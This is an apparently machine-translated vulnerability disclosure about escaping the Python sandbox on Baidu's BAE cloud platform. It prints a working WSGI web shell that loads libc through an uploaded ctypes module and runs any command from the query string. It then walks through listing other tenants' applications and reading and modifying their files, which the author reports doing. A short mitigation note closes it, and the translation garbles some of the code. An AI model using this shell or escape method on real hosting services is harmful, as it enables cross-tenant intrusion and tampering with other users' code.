Baidu BAE Series 2: System Command Execution,/etc/passwd and read/write other User Files

The Baidu BAE environment imposes improper restrictions on important functions and can break through the execution of system commands to read and write program files of many other users on the server.
The problem exists in the python environment of BAE, and the restrictions on modules and functions are inappropriate. For example, you can upload the ctypes module (this module does not exist by default in the environment) and load the so extension to execute system commands. First shell (of course, there must be a python BAE application, index. py): #-*-coding: UTF-8-*-import osimport ctypes # Find the ctypes folder def app (environ, start_response) in your local python2.7 environment ): status = '100 OK 'headers = [('content-type', 'text/html')] start_response (status, headers) cmd = environ ['query _ string'] cmd = cmd. replace ('% 20 ',''). replace ('% 3E', '> '). replace ('% 3C', '<'). replace ('% 27 ',"'"). replace ('% 22',' "') l = ctypes. cdll. loadLibrary ('/li B64/libc. so.6 ') l. system (cmd + ">/home/bae/instanceall/instance1/codefs/0. * ** .duapp.com/111.txt ") # *** indicates the application name content ='' for line in open ("/home/bae/instanceall/instance1/codefs/0. * ** .duapp.com/111.txt "): content = content + line +" \ n "return content from bae. core. wsgi import WSGIApplicationapplication = WSGIApplication (app). Of course, this is the final analysis result. The process is as follows: 1. dir, OS, subprocess, and other modules. methods that can execute commands are castrated. The import commands module is No m. Odule named commands. 2. upload your local commands. py and import it. However, the execution of system commands is not successful and is based on the OS module. Although it was unsuccessful, I opened the idea and only needed to upload the corresponding file to use the missing module. 3. How about executing the so extension? The ctypes module does not exist. upload your local ctypes folder, and import and perform cdll. After compiling a so extension upload, the program is interrupted when no result is executed. The visual test may be different from the BAE compiling environment. 4. How about the so extension on the BAE server? Load/lib64/libc. so.6 and execute system successfully, so the above shell is available. 5. ls/home/bae/instanceall/instance1/codefs to view the Application List of other users. There is no pressure to try to read the file content, and there is no pressure to modify it (test the modification of another php application file, successful ).

 




Solution:


Disable loading of so extensions. I wonder if I can use a lower-level restriction method? Many python modules are written in the python language. At the python level, it is easy to restrict modules or functions by uploading related files. I hope to share the solution.